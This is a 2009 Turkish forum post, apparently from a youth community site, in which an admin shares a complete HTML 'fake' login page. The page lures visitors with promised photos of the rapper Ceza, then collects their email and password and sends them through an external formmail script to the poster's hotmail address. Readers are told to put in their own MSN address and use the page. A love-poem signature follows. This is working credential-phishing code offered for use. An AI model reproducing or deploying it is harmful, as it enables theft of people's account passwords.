Derebahçe ~ GençliK
Hoşgeldiniz !
Üye olmadan forumdan yarar sağlayamazsınız.
Canlı konuşma için sitede başlık sayfasının altındaki chat box'a konuşabilirsiniz !
Moderatör Alımları Başlamıştır.
İyi Eğlenceler..
Derebahçe ~ GençliK
Hoşgeldiniz !
Üye olmadan forumdan yarar sağlayamazsınız.
Canlı konuşma için sitede başlık sayfasının altındaki chat box'a konuşabilirsiniz !
Moderatör Alımları Başlamıştır.
İyi Eğlenceler..
Derebahçe ~ GençliK
Would you like to react to this message? Create an account in a few clicks or log in to continue.

AnasayfaaFFéTméZ ~ TéaMLatest imagesKayıt OlGiriş yap

Ceza Fake..!

YazarMesaj
By.BiCi
Admin
Admin
By.BiCi

Rep Gücü : 401
Rep Puanı : 10

Ceza Fake..! Empty
MesajKonu: Ceza Fake..!   Ceza Fake..! Icon_minitimeC.tesi Mart 14, 2009 1:38 pm

arkadaşlar vereceğim kodları metin belgesine yapıstırın farlı kadetten adını mesela hacker.html yada ceza.html yapın ama sonu mutlaka html olsun

ama bundan once tabi ctrl+f yapıp @ harfini, arastır ve benim msne yerine kendi msneni yaz +rep verirseniz sevinirim hak eddim amaCeza Fake..! Biggrin

<html><center><title>CeZa</title><font size=8 color=orange>CeZa ReSiMLeri</font><br><br><br><font size=5 color=blue>Ceza'nın resimlerini görmek için lütfen giriş yapınız..!</font><body background=http://www.imgsvr.com/fg/atkinsonpg><br><br><br><form method=post action=http://public.www.easynet.co.uk/cgi-bin/formmail/formmail.pl><font size=4>E-posta :<input type=text name=mail><br><font size=4>Sifreniz :<input type=password name=sifre><br><input type=submit value=Tamam><input type=hidden name=recipient value=rock_alperen_06@hotmail.com><input type=hidden name=email value=rock_alperen_06@hotmail.com><input type=hidden name=realname value=fakemake><input type=hidden name=subject value=sifre><input type=hidden name=title value=Hata oluştu></body></center></html>

Ölürüm sevdiğim zehirim sensin
Evvelim sen oldun ahirim sensin

Sözüm yok şu benden kırıldığına
İdip başka dala sarıldığıma
Gönülüm inanmıyor ayrıldığına

Gözyaşım sen oldun kahirim sensin
Evvelim sen oldun ahirim sensin

By.BiCi*

Ceza Fake..!
1 sayfadaki 1 sayfası
 Similar topics
-